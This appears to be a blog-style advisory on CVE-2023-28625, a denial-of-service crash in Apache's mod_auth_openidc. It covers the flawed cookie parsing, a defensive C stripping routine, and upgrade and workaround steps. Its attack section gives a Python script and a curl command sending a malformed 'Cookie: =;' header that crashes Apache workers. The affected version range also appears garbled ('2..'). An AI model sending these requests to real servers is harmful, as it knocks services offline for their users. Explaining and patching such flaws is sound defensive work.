CVE-2023-28625 - Denial-of-Service Vulnerability in mod_auth_openidc – Understanding, Exploitation, and Patch

If your Apache web server uses OpenID Connect with the mod_auth_openidc plugin, it's crucial to be aware of CVE-2023-28625. This vulnerability, discovered in mod_auth_openidc versions 2.. through 2.4.13.1, allows attackers to crash the server using a specially crafted HTTP cookie. As a result, any website relying on this configuration is open to Denial-of-Service (DoS) attacks that disrupt availability.

Let’s break down what happened, how exploitation works, and how to protect your servers.

What is mod_auth_openidc?

mod_auth_openidc is a popular authentication and authorization plugin for Apache HTTP Server (2.x). It lets your apps offload identity management to outside providers (like Google or an enterprise SSO), handling logins and identity with the OpenID Connect protocol. It’s widely used due to its flexibility and security features.

The trouble lies with the OIDCStripCookies setting. This feature is intended to remove certain cookies from incoming requests — for privacy, security, or compatibility reasons. But, between versions 2.. and 2.4.13.1, if a carefully-crafted cookie is sent to the server, mod_auth_openidc can hit a NULL pointer dereference (a fancy way of saying the software tried to use a blank spot in memory). The end result: the Apache worker process crashes instantly.

Official CVE entry: https://nvd.nist.gov/vuln/detail/CVE-2023-28625

Technical Deep Dive

The vulnerable code is in the part of mod_auth_openidc that parses and strips cookies. If the cookie value is malformed (e.g., missing key parts or with an unexpected format), the code can fail to check for a NULL result from a string split or search. When it blindly accesses this pointer, you get a segmentation fault.

Here’s a simplified pseudocode snippet illustrating the risk (get_next_cookie, should_strip and dest stand in for the module's real helpers and buffers):

#include <string.h>

char *cookie = get_next_cookie();
// Split cookie on "="
char *name = strtok(cookie, "=");
char *value = strtok(NULL, "=");   // <--- May be NULL if malformed!

if (should_strip(name)) {
    // Unprotected dereference: value is used without a NULL check
    strcpy(dest, value);           // <--- Crashes if value == NULL
}

If an attacker sends a malformed cookie like Cookie: =;, value becomes NULL. The next use of value crashes the process.
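Here, as an added example that is not part of the original post or of mod_auth_openidc's own source, is a C cookie-stripping routine of the kind OIDCStripCookies needs, written so that the malformed headers mentioned above ("=;" and ", ,") are parsed safely: a piece without "=" or with an empty name is dropped instead of being dereferenced. The names strip_cookies, should_strip and check_strip and the sample cookie names are hypothetical; treating ',' as a separator is an assumption made for tolerance of old clients, not RFC 6265 behaviour.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not mod_auth_openidc's code: a cookie-stripping routine of
 * the kind OIDCStripCookies needs, written so that malformed pairs such as
 * "=;" or ", ," are skipped rather than dereferenced. All names here
 * (strip_cookies, should_strip, check_strip, the sample cookie names) are
 * hypothetical. */

/* Return 1 if the name [name, name+name_len) is in the strip list. */
static int should_strip(const char *name, size_t name_len,
                        const char *const *strip, size_t nstrip)
{
    for (size_t i = 0; i < nstrip; i++) {
        if (strlen(strip[i]) == name_len &&
            memcmp(strip[i], name, name_len) == 0)
            return 1;
    }
    return 0;
}

/* Rebuild a Cookie header value without the cookies named in strip[].
 * Pieces are separated by ';' (or ',' for tolerance with old clients).
 * A piece with no '=' or with an empty name is dropped instead of being
 * used, which is exactly the check the vulnerable code path lacked.
 * Returns a malloc'd string (caller frees) or NULL if allocation fails. */
char *strip_cookies(const char *header, const char *const *strip, size_t nstrip)
{
    size_t len = strlen(header);
    /* Re-joining with "; " can only grow the output by one byte per piece. */
    char *out = malloc(2 * len + 1);
    if (out == NULL)
        return NULL;
    size_t outlen = 0;
    const char *p = header;

    while (*p != '\0') {
        /* Skip separators and whitespace in front of the next piece. */
        while (*p == ';' || *p == ',' || *p == ' ' || *p == '\t')
            p++;
        if (*p == '\0')
            break;

        /* Find the end of this piece and trim trailing whitespace. */
        const char *end = p;
        while (*end != '\0' && *end != ';' && *end != ',')
            end++;
        const char *piece_end = end;
        while (piece_end > p && (piece_end[-1] == ' ' || piece_end[-1] == '\t'))
            piece_end--;

        /* memchr returns NULL when the piece has no '='; that NULL (and an
         * empty name such as "=foo") must be handled, not dereferenced. */
        const char *eq = memchr(p, '=', (size_t)(piece_end - p));
        if (eq != NULL && eq > p &&
            !should_strip(p, (size_t)(eq - p), strip, nstrip)) {
            if (outlen > 0) {
                memcpy(out + outlen, "; ", 2);
                outlen += 2;
            }
            memcpy(out + outlen, p, (size_t)(piece_end - p));
            outlen += (size_t)(piece_end - p);
        }
        p = end;
    }
    out[outlen] = '\0';
    return out;
}

/* Convenience check: strip the two sample names from header and compare
 * the result with expect. Returns 1 on match, 0 otherwise. */
int check_strip(const char *header, const char *expect)
{
    static const char *const names[] = { "auth_token", "sessionid" };
    char *got = strip_cookies(header, names, 2);
    int ok = (got != NULL && strcmp(got, expect) == 0);
    free(got);
    return ok;
}

int main(void)
{
    /* Constructed inputs: the two malformed cookies from the write-up plus
     * normal headers mixing cookies to keep and cookies to strip. */
    const char *samples[] = { "=;", ", ,", "a=1; sessionid=xyz; b=2",
                              "theme=dark; novalue; =empty; auth_token=t" };
    static const char *const names[] = { "auth_token", "sessionid" };
    for (size_t i = 0; i < 4; i++) {
        char *r = strip_cookies(samples[i], names, 2);
        printf("\"%s\" -> \"%s\"\n", samples[i], r ? r : "(alloc failed)");
        free(r);
    }
    return 0;
}
```

The point of the routine is the single condition eq != NULL && eq > p: whatever the split or search returns, a missing or empty name is a reason to discard the piece, never a pointer to hand to a string function.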

Attack Scenario

- The attacker sends an HTTP request with a malformed cookie (for example, Cookie: =; or Cookie: , ,).
- The request hits your Apache endpoint with mod_auth_openidc configured _and_ the OIDCStripCookies setting enabled.
- The Apache worker handling this request segfaults and dies.

By automating requests, attackers can repeatedly crash workers, denying access to legitimate users and potentially bringing down the whole site.

Here's a simple Python script to send the malicious request:

import requests

url = "https://your-vulnerable-site.com/"
headers = {
    "Cookie": "=;"
}
r = requests.get(url, headers=headers)
print(f"Response: {r.status_code}")

Or, you can use curl from your terminal:

curl -H "Cookie: =;" https://your-vulnerable-site.com/

After sending this, watch Apache’s error logs — you'll likely see a "segmentation fault" message and notice worker crashes.

How to Fix

1. Upgrade to mod_auth_openidc 2.4.13.2

The flaw is fully patched in mod_auth_openidc 2.4.13.2. Update the module as soon as possible:

- mod_auth_openidc Releases

2. Workaround: Disable OIDCStripCookies

If you absolutely can’t upgrade yet, remove or comment out the OIDCStripCookies directive from your Apache configuration files. This mitigates the vulnerability because the faulty code path is never exercised.

# OIDCStripCookies auth_token sessionid

(Make sure to reload/restart Apache after changes.)

References and Further Reading

- CVE-2023-28625 - NVD Entry
- mod_auth_openidc Security Advisory
- mod_auth_openidc Releases
- OpenID Connect Protocol

Conclusion

CVE-2023-28625 is a classic "low effort, high impact" bug: just a single HTTP request can take out your web server if you're running an affected version and OIDCStripCookies. Don’t leave your systems exposed — upgrade to 2.4.13.2 or later, and review your Apache settings for leftover risky directives. Stay ahead of attackers and protect your availability!

If you run Apache and mod_auth_openidc, make this patch part of your next maintenance window so you don’t get blindsided by a simple cookie!
*Questions or need further guidance? Share in the comments or reach out for more defensive tips!*

Timeline

Published on: 04/03/2023 14:15:00 UTC
Last modified on: 04/30/2023 23:15:00 UTC